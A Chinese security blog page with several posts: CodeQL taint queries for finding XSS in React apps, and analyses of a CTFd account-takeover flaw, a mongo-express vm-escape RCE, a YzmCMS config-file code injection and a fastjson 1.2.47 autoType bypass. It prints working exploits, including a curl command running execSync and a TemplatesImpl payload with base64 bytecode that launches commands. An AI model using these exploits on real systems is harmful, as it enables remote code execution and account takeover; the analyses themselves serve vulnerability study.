Fork me on GitHub

Posted on | Edited on

近日研究了一下codeql这个源代码分析工具,由于工作中接触到的React框架的web应用较多,往日人工审计源码挖掘XSS通常是在Webstorm中寻找dangerouslySetInnerHTML等调用点,人工工作量较为复杂且可能遗漏一些东西,所以便尝试能否用codeql来辅助挖掘React应用中的XSS。

React应用中常见的XSS类型

React应用的XSS的产生情况一般有:

  • 调用dangerouslySetInnerHTML
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    class Hello extends React.Component {
      render() {
        return <div
            dangerouslySetInnerHTML={{html:'<img/src="x"/onerror="alert(1)"/>'}}
        ></div>;
      }
    }

    ReactDOM.render(
      <Hello name="World" />,
      document.getElementById('container')
    );

直接将恶意html渲染到DOM中;

  • a标签的链接判断不严格
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    const userWebsite = "javascript:alert('Hacked!');";
    class UserProfilePage extends React.Component {
      render() {
        return (
          <a href={userWebsite}>My Website</a>
        )
      }
    }

    ReactDOM.render(<UserProfilePage />, document.querySelector("#app"));

a标签对于链接缺少过滤,可以通过插入javascript类的url来实现oneclick XSS.

  • 直接调用innerHTML/outerHTML

    1
    2
    var x=document.createElement('div')
    x.innerHTML="user controllable data";

  • 直接设置href

    1
    2
    var x=document.createElement('a')
    x.href="javascript:alert(1)";

  • 参数注入(注入dangerouslySetInnerHTML的情况)

    1
    2
    3
    4
    5
    6
    let r={...input}
    return (
        <div 
        ...r
        ></div>
    )

参数注入的情况在我们的业务中较为少见,因此重点考虑前四种XSS情形的挖掘方式。

codeql实现

codeql一个重要功能便是能够跟踪数据流,我们只需要编写继承于TaintTracking::Configuration类的数据流设置类,定义好isSource,isSink,isAdditionalTaintStep这几个方法即可,其中isSource表示数据流的源头,isSink表示数据流流向目标,isAdditionalTaintStep表示额外的连接数据流的判断。
对于React应用而言Source点其实不是很容易确定,而且盲目设置Source来源于location.hash/XHR如果isAdditionalTaintStep函数设置不好的话很难能达到预期结果。因此我仅仅判断了Source是否是常量的情形。

dangerouslySetInnerHTML

Source 定义如下

1
2
3
4
override predicate isSource(DataFlow::Node nd){
       not (nd.asExpr() instanceof ConstantExpr)
       and not exists(nd.toString().toLowerCase().indexOf("icon"))
    }

这里的第一行的判断便是判断Source点是否是一个常量类型的表达式,而第二行则是由于dangerouslySetInnerHTML经常被应用于加载某些svg图片,我们需要确定一下Source是否仅仅是一个图标类型的变量。

Sink则只需要判断这个节点是否是一个jsx的标签属性即可,实现如下

1
2
3
4
5
6
7
8
 class ReactDangerousSetInnerHTMLSinks extends DataFlow::Node {
   ReactDangerousSetInnerHTMLSinks() {
    exists(JSXAttribute attr |
      attr.getName() = "dangerouslySetInnerHTML" and attr.getValue() = this.asExpr()
    )

  }
}

对于dangerouslySetInnerHTML的情况,我们还需要注意判断对于html属性的写操作,因为dangerouslySetInnerHTML的html属性才是真正的恶意输入点,否则codeql语句判断数据流时可能会停止到{html:xxx}这个语句,不会继续跟进xxx经过了哪些数据流。因此这里的isAdditionalTaintStep方法定义如下

1
2
3
4
5
6
7
override predicate isAdditionalTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
        exists(DataFlow::ObjectLiteralNode obj, DataFlow::Node html_value |
        obj.hasPropertyWrite("__html", html_value) and
        succ = obj and
        pred = html_value
        )
    }

针对dangerouslySetInnerHTML的codeql语句最终如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

import javascript


class ReactDangerousSetInnerHTMLSinks extends DataFlow::Node {
   ReactDangerousSetInnerHTMLSinks() {
    exists(JSXAttribute attr |
      attr.getName() = "dangerouslySetInnerHTML" and attr.getValue() = this.asExpr()
    )

  }
}

class ReactSetInnerHtmlTracker extends TaintTracking::Configuration{
    ReactSetInnerHtmlTracker() {
        this = "ReactSetInnerHtmlTracker"
    }

    override predicate isSource(DataFlow::Node nd){
       not (nd.asExpr() instanceof ConstantExpr)
       and not exists(nd.toString().toLowerCase().indexOf("icon"))
    }

    override predicate isSink(DataFlow::Node nd){
        nd instanceof ReactDangerousSetInnerHTMLSinks
    }

    override predicate isAdditionalTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
        exists(DataFlow::ObjectLiteralNode obj, DataFlow::Node html_value |
        obj.hasPropertyWrite("__html", html_value) and
        succ = obj and
        pred = html_value
        )
    }
}



from ReactSetInnerHtmlTracker pt, DataFlow::Node source, DataFlow::Node sink
where pt.hasFlow(source, sink)
select source,sink

isAdditionalTaintStep方法也可以继续优化,加入是否经过了Dompurify过滤、是否经过编码转换函数等。

a标签判断不严格的情况

只需要对上面的例子做更改即可,可以只修改Sink将属性改为href,去掉isAdditionalTaintStep方法,这里的实现如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import javascript

class ReactSetHrefSinks extends DataFlow::Node {
   ReactSetHrefSinks() {
    exists(JSXAttribute attr |
      attr.getName() = "href" and attr.getValue() = this.asExpr()
    )

  }
}

class ReactSetHrefTracker extends TaintTracking::Configuration{
    ReactSetHrefTracker() {
        this = "ReactSetHrefTracker"
    }

    override predicate isSource(DataFlow::Node nd){
       exists(|
       not (nd.asExpr() instanceof ConstantExpr)
       and not exists(nd.toString().toLowerCase().indexOf("icon"))
       )
    }

    override predicate isSink(DataFlow::Node nd){
      nd instanceof ReactSetHrefSinks
    }

}



from ReactSetHrefTracker pt, DataFlow::Node source, DataFlow::Node sink
where pt.hasFlow(source, sink)
select source,sink

innerHTML/outerHTML/href

Sink只需要判断是存在PropWrite事件,写入的属性为innerHTML/outerHTML/href即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import javascript

class InnerHTMLSinks extends DataFlow::Node {
   InnerHTMLSinks(){
       exists(DataFlow::PropWrite pw |
       pw.getPropertyName().regexpMatch("(innerHTML|outerHTML)")
       and pw.getRhs() = this
       )
   }
}

class InnerHtmlTracker extends TaintTracking::Configuration{
    InnerHtmlTracker() {
        this = "InnerHtmlTracker"
    }

    override predicate isSource(DataFlow::Node nd){
       not nd.asExpr() instanceof ConstantExpr
    }

    override predicate isSink(DataFlow::Node nd){
        nd instanceof InnerHTMLSinks
    }
}



from InnerHtmlTracker pt, DataFlow::Node source, DataFlow::Node sink
where pt.hasFlow(source, sink)
select source,sink

一个针对DOMXSS的判断例子

这里用一个针对DOMXSS的判断来说明一下怎样充分利用DataFlow功能的isSource,isSinkisAdditionalTaintStep函数来追踪一个比较完整的数据流。

有网友发来一个邮件请求帮忙针对以下的DOMXSS例子编写codeql查询:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>DoraBox - DOM_XSS</title>
</head>
<body>
<form action='' method='GET'>
name: 
<input type='text' name='name' id='form1'>
<input type='submit' name='submit' value='submit'>
</form>
<hr>
<script type='text/javascript'>
function getURLValue(name){
 	var reg = new RegExp('(^|&)'+ name +'=([^&]*)(&|$)');
	var r = window.location.search.substr(1).match(reg);
	if(r != null){
 		return unescape(r[2]);
 	}else{
	 	return "";
 	}
}
document.write(getURLValue('name'));
</script>
</body>
</html>

这里的XSS例子是从location.search中取出内容来输出到网页上。

针对来自url的DOMXSS,我们可以按如下的方式定义Source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class LocationHashSource extends DataFlow::Node {
    LocationHashSource() {
        exists(CallExpr dollarCall, PropAccess pr |
      this.asExpr() instanceof CallExpr and
      (dollarCall.getCalleeName() = "split"
       or dollarCall.getCalleeName() = "substr"
        or dollarCall.getCalleeName() = "substring"
      ) and dollarCall.getReceiver() = pr
      and  (pr.getBase().toString() = "window.location" 
      or pr.getBase().toString() = "location")
      and this.asExpr() = dollarCall
      )
    }
}

这里主要判断是否存在函数调用,其中调用了split/substr/substring等方法,且这些方法的Receiver为window.location/location.

Sink点比较简单,直接参考上面React应用XSS的判断即可,这里定义了innerHTML和document.write两种类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
class DocumentWriteSinks extends DataFlow::Node {
   DocumentWriteSinks() {
    exists(CallExpr call|
        call.getCalleeName() = "write" 
        and call.getReceiver().toString() = "document" 
        and this.asExpr() = call.getArgument(0)
    )

  }
}

class InnerHTMLSinks extends DataFlow::Node {
    InnerHTMLSinks(){
        exists(DataFlow::PropWrite pw |
        pw.getPropertyName().regexpMatch("(innerHTML|outerHTML)")
        and pw.getRhs() = this
       )
    }
}

而为了能够保证经过unescape/decodeURI等编码类函数数据流仍然不断开,需要编写isAdditionalTaintStep函数来添加额外的数据流判断

1
2
3
4
5
6
7
8
9
10
override predicate isAdditionalTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
    exists(CallExpr call |
    (call.getCalleeName() = "unescape"
        or call.getCalleeName() = "atob"
        or call.getCalleeName() = "decodeURI"
        or call.getCalleeName() = "decodeURIComponent"
    ) and succ.asExpr() = call and
    pred.asExpr() = call.getArgument(0)
    )
}

这里判断条件只判断了是否调用了unescape/atob/decodeURI/decodeURIComponent等方法,如果调用则方法的参数为前驱,方法的结果为后继,从而保证数据流流经这些函数仍然能够继续追踪。

综上,针对这种DOMXSS的codeql语句实现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import javascript

class DocumentWriteSinks extends DataFlow::Node {
   DocumentWriteSinks() {
    exists(CallExpr call|
        call.getCalleeName() = "write" 
        and call.getReceiver().toString() = "document" 
        and this.asExpr() = call.getArgument(0)
    )

  }
}

class InnerHTMLSinks extends DataFlow::Node {
    InnerHTMLSinks(){
        exists(DataFlow::PropWrite pw |
        pw.getPropertyName().regexpMatch("(innerHTML|outerHTML)")
        and pw.getRhs() = this
       )
    }
}

class LocationHashSource extends DataFlow::Node {
    LocationHashSource() {
        exists(CallExpr dollarCall, PropAccess pr |
      this.asExpr() instanceof CallExpr and
      (dollarCall.getCalleeName() = "split"
       or dollarCall.getCalleeName() = "substr"
        or dollarCall.getCalleeName() = "substring"
      ) and dollarCall.getReceiver() = pr
      and  (pr.getBase().toString() = "window.location" 
      or pr.getBase().toString() = "location")
      and this.asExpr() = dollarCall
      )
    }
}

class DocumentWriteTracker extends TaintTracking::Configuration{
   DocumentWriteTracker() {
        this = "DocumentWriteTracker"
    }

    override predicate isSource(DataFlow::Node nd){
       nd instanceof LocationHashSource
    }

    override predicate isSink(DataFlow::Node nd){
        nd instanceof DocumentWriteSinks
        or nd instanceof InnerHTMLSinks
    }

    override predicate isAdditionalTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
        exists(CallExpr call |
        (call.getCalleeName() = "unescape"
            or call.getCalleeName() = "atob"
            or call.getCalleeName() = "decodeURI"
            or call.getCalleeName() = "decodeURIComponent"
        ) and succ.asExpr() = call and
        pred.asExpr() = call.getArgument(0)
        )
    }
}

from DocumentWriteTracker pt, DataFlow::Node source, DataFlow::Node sink
where pt.hasFlow(source, sink) 
select source,sink

参考资料

Posted on

最近注意到twitter上有大牛提到CTFd最新修复的一个账户接管漏洞,且放出了commit id,这里分析一下这个漏洞的利用方式。

这个漏洞主要出现在注册的逻辑中,跟进注册账号的逻辑https://github.com/CTFd/CTFd/blob/2.2.0-dev/CTFd/auth.py#L156

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
def register():
    errors = get_errors()
    if request.method == "POST":
        name = request.form["name"]
        email_address = request.form["email"]
        password = request.form["password"]

        name_len = len(name) == 0
        names = Users.query.add_columns("name", "id").filter_by(name=name).first()
        
        # 省略一部分代码
        
        if names:
            errors.append("That user name is already taken")
        
        # 省略一部分代码
        if len(errors) > 0:
            return render_template(
                "register.html",
                errors=errors,
                name=request.form["name"],
                email=request.form["email"],
                password=request.form["password"],
            )
        else:
            with app.app_context():
                user = Users(
                    name=name.strip(),
                    email=email_address.lower(),
                    password=password.strip(),
                )
                db.session.add(user)
                db.session.commit()
                db.session.flush()

                login_user(user)

可以看到在判断用户名是否重复时,使用的用户名是从post数据中直接得到的name值,然而入库时却将这个name值做了strip处理去掉首尾的空字符。因此我们只要注册一个首位加空格的用户名即可绕过用户名不能重复的限制。

我们再来看一下找回密码的逻辑https://github.com/CTFd/CTFd/blob/2.2.0-dev/CTFd/auth.py#L95

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
@auth.route("/reset_password", methods=["POST", "GET"])
@auth.route("/reset_password/<data>", methods=["POST", "GET"])
@ratelimit(method="POST", limit=10, interval=60)
def reset_password(data=None):
    if data is not None:
        try:
            name = unserialize(data, max_age=1800)
        except (BadTimeSignature, SignatureExpired):
            return render_template(
                "reset_password.html", errors=["Your link has expired"]
            )
        except (BadSignature, TypeError, base64.binascii.Error):
            return render_template(
                "reset_password.html", errors=["Your reset token is invalid"]
            )

        if request.method == "GET":
            return render_template("reset_password.html", mode="set")
        if request.method == "POST":
            user = Users.query.filter_by(name=name).first_or_404()
            user.password = request.form["password"].strip()
            db.session.commit()
            log(
                "logins",
                format="[{date}] {ip} -  successful password reset for {name}",
                name=name,
            )
            db.session.close()
            return redirect(url_for("auth.login"))

找回密码时从链接参数中取data值,将其反序列化后可获得用户名,即可更改任意用户的密码。我们再看一下这个链接是怎么得到的,也就是data是怎么生成的,在https://github.com/CTFd/CTFd/blob/eec535b739a43a6e37735e4251244974185f6634/CTFd/utils/email/__init__.py#L19

1
2
3
4
5
6
7
8
9
def forgot_password(email, team_name):
    token = serialize(team_name)
    text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(
        url_for("auth.reset_password", _external=True), token
    )

    return sendmail(email, text)

可以看到这个token是直接将team_name做一次序列化处理后拼接到url中发送到用户的邮箱。查看serialize方法的实现https://github.com/CTFd/CTFd/blob/eec535b739a43a6e37735e4251244974185f6634/CTFd/utils/security/signing.py#L10

1
2
3
4
5
def serialize(data, secret=None):
    if secret is None:
        secret = current_app.config["SECRET_KEY"]
    s = URLSafeTimedSerializer(secret)
    return s.dumps(data)

正是利用flask自身的类似客户端cookie的序列化方式做了一个加密。

结合上面的注册以及找回密码的流程,我们的攻击方式便很明显了:

  1. 利用添加空格绕过限制来注册一个与受害者用户名相同的账号
  2. 生成忘记密码链接发送到自己的邮箱
  3. 将自己的账号的用户名改成与被攻击者不相同的用户名
  4. 用邮箱中收到的链接更改密码即可。

这个漏洞分析比较简单,算是实战account takeover代码审计的一个不错的例子。

Posted on

exp

1
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("open -a Calculator")'

具体分析

查找checkValid相关的路由,在https://github.com/mongo-express/mongo-express/blob/v0.53.0/lib/router.js可以找到

1
2
3
4
5
6
const router = function (config) {
  // ...
  const appRouter = express.Router();
  appRouter.post('/checkValid', mongoMiddleware, configuredRoutes.checkValid);
  return appRouter;
}

跟进configuredRoutes.checkValidhttps://github.com/mongo-express/mongo-express/blob/v0.53.0/lib/routes/document.js](https://github.com/mongo-express/mongo-express/blob/v0.53.0/lib/routes/document.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
var routes = function (config) {
  // ...
  var exp = {};
  exp.checkValid = function (req, res) {
    var doc = req.body.document;
    try {
      bson.toBSON(doc);
    } catch (err) {
      console.error(err);
      return res.send('Invalid');
    }

    res.send('Valid');
  };
  return exp;
}

这里看到取post参数document的内容进入了bson.toBSON,跟进该函数的定义https://github.com/mongo-express/mongo-express/blob/v0.53.0/lib/bson.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
var mongodb = require('mongodb');
var vm      = require('vm');
var json    = require('./json');

// ...

//JSON.parse doesn't support BSON data types
//Document is evaluated in a vm in order to support BSON data types
//Sandbox contains BSON data type functions from node-mongodb-native
exports.toBSON = function (string) {
  var sandbox = exports.getSandbox();

  string = string.replace(/ISODate\(/g, 'new ISODate(');
  string = string.replace(/Binary\(("[^"]+"),/g, 'Binary(new Buffer($1, "base64"),');

  vm.runInNewContext('doc = eval((' + string + '));', sandbox);

  return sandbox.doc;
};

// This function as the name suggests attempts to parse
// the free form string in to BSON, since the possibilities of failure
// are higher, this function uses a try..catch
exports.toSafeBSON = function (string) {
  try {
    var bsonObject = exports.toBSON(string);
    return bsonObject;
  } catch (err) {
    return null;
  }
};

可以看到这里toBson的操作直接将参数拼接传入vm.runInNewContext中,而nodejs的vm模块并不是一个特别安全的隔离环境,可以通过this.constructor.constructor来逃逸到全局范围从而引入process等nodeapi. 使用process.mainModule.require即可引入任意库从而实现RCE.

Posted on | Edited on

EIS中有一道cms 后台getshell的实战类题目,其中写入配置文件从而getshell的方式很经典,这里简单一下这个getshell的原理,仅作学习

来看写入配置文件的逻辑,全局搜索file_put_contents就可以找到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
 * 设置config文件
 * @param $config 配置信息
 */
function set_config($config) {
	$configfile = YZMPHP_PATH.'common'.DIRECTORY_SEPARATOR.'config/config.php';
	if(!is_writable($configfile)) showmsg('Please chmod '.$configfile.' to 0777 !', 'stop');
	$pattern = $replacement = array();
	foreach($config as $k=>$v) {
		$pattern[$k] = "/'".$k."'\s*=>\s*([']?)[^']*([']?)(\s*),/is";
		$replacement[$k] = "'".$k."' => \${1}".$v."\${2}\${3},";					
	}
	$str = file_get_contents($configfile);
	$str = preg_replace($pattern, $replacement, $str);
	return file_put_contents($configfile, $str, LOCK_EX);		
}

Config.php的内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
<?php
return array(

    //系统配置
    'site_theme'         => 'default',    //站点默认主题目录
    'url_html_suffix'    => '.html',      //URL伪静态后缀
    'set_pathinfo'       => false,         //Nginx默认不支持PATHINFO模式,需配置此项为true,则Nginx可支持PATHINFO,系统默认为false
    
    //数据库配置
    'db_type' => 'pdo',     	  // 数据库链接扩展 , 支持 pdo | mysqli | mysql
    'db_host' => 'mysql',  // 服务器地址
    'db_name' => 'yzmcms',		// 数据库名
    'db_user' => 'root',       // 用户名
    'db_pwd' => 'root@3556',       		// 密码
    'db_port' => 3306,         // 端口
    'db_prefix' => 'yzm_',        // 数据库表前缀
    
    //路由配置
    'route'              => array('m' => 'index', 'c' => 'index', 'a' => 'init'),  //默认加载配置,基中“m”为模块,“c”为控制器,“a”为方法
    'route_mapping'      => true,         //是否开启路由映射
    //路由映射规则
    'route_rules'        => array(),
    
    //Cookie配置
    'cookie_domain'      => '',           //Cookie 作用域
    'cookie_path'        => '/',          //Cookie 作用路径
    'cookie_ttl'         => 0,            //Cookie 生命周期,0 表示随浏览器进程
    'cookie_pre'         => 'yzmphp_',    //Cookie 前缀,同一域名下安装多套系统时,请修改Cookie前缀
    'cookie_secure'      => false,        //是否通过安全的 HTTPS 连接来传输 cookie
    
    //缓存配置
    'cache_type'         => 'file',     	// 缓存类型【暂支持 file , redis , memcache 】
    //缓存类型为file缓存时的配置项
    'file_config'        => array (
		'cache_dir'      => YZMPHP_PATH.'cache/chche_file/',    //缓存文件目录
		'suffix'         => '.cache.php',  //缓存文件后缀
		'mode'           => '2',           //缓存格式:mode 1 为serialize序列化, mode 2 为保存为可执行文件array
    ), 
    //缓存类型为redis缓存时的配置项
    'redis_config'       => array (
		'host'           => '127.0.0.1',    // redis主机
		'port'           => 6379,           // redis端口
		'password'       => '',             // 密码
		'select'         => 0,              // 操作库
		'timeout'        => 0,              // 超时时间(秒)
		'expire'         => 3600,           // 有效期(秒)
		'persistent'     => false,          // 是否长连接
		'prefix'         => '',             // 前缀
    ), 
    //缓存类型为memcache缓存时的配置项
    'memcache_config'    => array (
		'host'           => '127.0.0.1',    // memcache主机
		'port'           => 11211,          // memcache端口
		'timeout'        => 0,              // 超时时间(秒)
		'expire'         => 3600,           // 有效期(秒)
		'persistent'     => false,          // 是否长连接
		'prefix'         => '',             // 前缀
    ),
    
    //系统语言
    'language'           => 'zh_cn',      //【暂支持 简体中文zh_cn 和 美式英语en_us】
    
    //附件相关配置
    'upload_file'        => 'uploads',    //上传文件目录,后面一定不要加斜杠(“/”)
    'watermark_enable'   => '1',          //是否开启图片水印
    'watermark_name'     => 'mark.png',   //水印名称
    'watermark_position' => '9',          //水印位置
    
    //其他设置
    'sql_execute'        => false,        //是否允许在线执行SQL命令
    'edit_template'      => false,        //是否允许在线编辑模板

);
?>

这里的逻辑是正则匹配出原config.php文件的key=>value对,然后替换为新的配置。

这个cms存在全局过滤,过滤机制类似phpcms的过滤函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/**
 * 安全过滤函数
 *
 * @param $string
 * @return string
 */
function safe_replace($string) {
	$string = str_replace('%20','',$string);
	$string = str_replace('%27','',$string);
	$string = str_replace('%2527','',$string);
	$string = str_replace('*','',$string);
	$string = str_replace('"','',$string);
	$string = str_replace("'",'',$string);
	$string = str_replace(';','',$string);
	$string = str_replace('<','&lt;',$string);
	$string = str_replace('>','&gt;',$string);
	$string = str_replace("{",'',$string);
	$string = str_replace('}','',$string);
	$string = str_replace('\\','',$string);
	return $string;
}

可以看到我们想要的单引号被过滤了,没有办法直接拼接单引号来注入代码到config.php中。

然而可以注意到replacement的内容为:

1
$replacement[$k] = "'".$k."' => \${1}".$v."\${2}\${3},";

再查看我们的匹配正则

1
$pattern[$k] = "/'".$k."'\s*=>\s*([']?)[^']*([']?)(\s*),/is";

https://res.cloudinary.com/durtftgrv/image/upload/v1574758722/blog/%E4%B8%8B%E8%BD%BD_pdhepw.png

可以看到匹配到的${1}正是单引号本身,因此我们只要添加值为${1}.phpinfo().${1}即可重新引入被

过滤掉的单引号,从而逃逸出来成功注入任意代码。

参考文档

https://blog.wonderkun.cc/2017/02/28/php%E5%86%99%E5%85%A5%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E7%BB%8F%E5%85%B8%E6%BC%8F%E6%B4%9E/

Posted on

我司的业务很少用到java所以之前这个漏洞爆出的时候并没有分析,最近想学一下java安全所以也顺便填一下这个坑。

fastjson 1.2.47 autoType 处理机制

查看PaserConfig.checkAutoType方法,此方法主要实现类型检验:

typeName的长度介于128与3之间会运行一系列的哈希计算,计算出哈希之后开始判断autoType

这里我们可以看到当autoType开启时fastjson会判断这个哈希是否在denyHashCodes中,如果在就会报错。因此也有人fuzz得到了一些黑名单中的类https://github.com/LeadroyaL/fastjson-blacklist。

如果autoType没有开启fastjson则会进行如下判断

从TypeUtils的缓存中寻找该类,或者从反序列化表也即白名单中寻找该类。这次的漏洞便是处在TypeUtils建立的缓存中。

从payload执行过程分析绕过原因

这次我是用的payload是templateImpl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "a":{
  "@type":"java.lang.Class",
  "val":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
	},
  "b":{
    "@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "_bytecodes":["yv66vgAAADMAOQoACQApCgAqACsIACwKACoALQcALgoABQApCAAvBwAwBwAxAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABVMSmF2YVVuc2VyL1NoZWxsRXhlYzsBAApFeGNlcHRpb25zBwAyAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAzAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHADABAApTb3VyY2VGaWxlAQAOU2hlbGxFeGVjLmphdmEMAAoACwcANAwANQA2AQASb3BlbiAtYSBDYWxjdWxhdG9yDAA3ADgBABNKYXZhVW5zZXIvU2hlbGxFeGVjAQARdG91Y2ggL3RtcC9uaW1hZGUBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAJAAAAAAAFAAEACgALAAIADAAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgANAAAADgADAAAAEwAEABQADQAVAA4AAAAMAAEAAAAOAA8AEAAAABEAAAAEAAEAEgABABMAFAABAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAGAAOAAAAKgAEAAAAAQAPABAAAAAAAAEAFQAWAAEAAAABABcAGAACAAAAAQAZABoAAwABABMAGwACAAwAAAA/AAAAAwAAAAGxAAAAAgANAAAABgABAAAAGwAOAAAAIAADAAAAAQAPABAAAAAAAAEAFQAWAAEAAAABABwAHQACABEAAAAEAAEAHgAJAB8AIAACAAwAAABBAAIAAgAAAAm7AAVZtwAGTLEAAAACAA0AAAAKAAIAAAAeAAgAHwAOAAAAFgACAAAACQAhACIAAAAIAAEAIwAQAAEAEQAAAAQAAQAIAAgAJAALAAEADAAAAE8AAgABAAAADrgAAhIHtgAEV6cABEuxAAEAAAAJAAwACAADAA0AAAASAAQAAAAOAAkAEQAMAA8ADQASAA4AAAACAAAAJQAAAAcAAkwHACYAAAEAJwAAAAIAKA=="],
    "_name":"a.b",
    "_tfactory":{ },
    "_outputProperties":{ },
    "_name":"a",
    "_version":"1.0",
    "allowedProtocols":"all"
  }

IDEA启动调试看一下为什么这个payload能绕过autoType限制。

反序列化流程的主要出发点在

我们跟进DefaultJSONParser.parse方法,开始是很多的lexer解析相关的操作。直接跳到对key为@type的处理

这里走到了我们之前提到的checkAutoType的操作,此时我们的类型为java.lang.Class,跟进checkAutoType分析,首先会进入TypeUtils.getClassFromMapping中看此类是否存在于我们的缓存类中。我们可以下断点看一下缓存类中都有哪些东西

这个map中并没有我们想要的java.lang.Class,且此时也没有我们想要的templatesImpl类。

继续跟进可以看到java.lang.Class正在ParseConfig.deserializers

因此我们可以直接得到我们该类型。

获取类型后继续跟进可以看到会用java.lang.Class的反序列化器即MiscCodec来反序列化java.lang.Class类。

跟进反序列化过程,又是一段很长的编译原理相关的lexer解析过程。解析出来val的键com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

之后便进行类的反序列化过程,在判断了是否为一些类之后进入如下分支

进入TypeUtils.loadClass方法,可以看到这次会通过classLoader生成类后把TemplatesImpl放到缓存map中

我们想要的类已经进入了mapping。

之后序列化b时mapping中存在TemplatesImpl类可以返回我们的TemplatesImpl类了,一切操作便像之前的反序列化漏洞相同了,通过JavaBeanDeserializer.deserialze来调用TemplatesImpl类的setXXX方法来RCE.可以参考http://hexo.imagemlt.xyz/post/java-unserialize-learning-3/index.html.

最后放个弹计算器的图片来结束这篇文章。web安全虽然入门容易,但是要成为跟orange等大牛一样厉害的国际大黑客还是需要学很多很多。

Posted on | Edited on

首发于https://www.anquanke.com/post/id/185377

周末打了一下XNUCA,可以说这是打CTF以来难度最高的一个比赛,全场交的flag不到100个也是十分真实,膜精心准备这次比赛的NESE的大师傅们。这里贴一下做出来的两个web题目的writeup与题目分析。

HardJS

我们的解法

比赛时听说ROIS的师傅们拿了一血而且是直接RCE的,因此便将重点放到了后端的代码审计上。
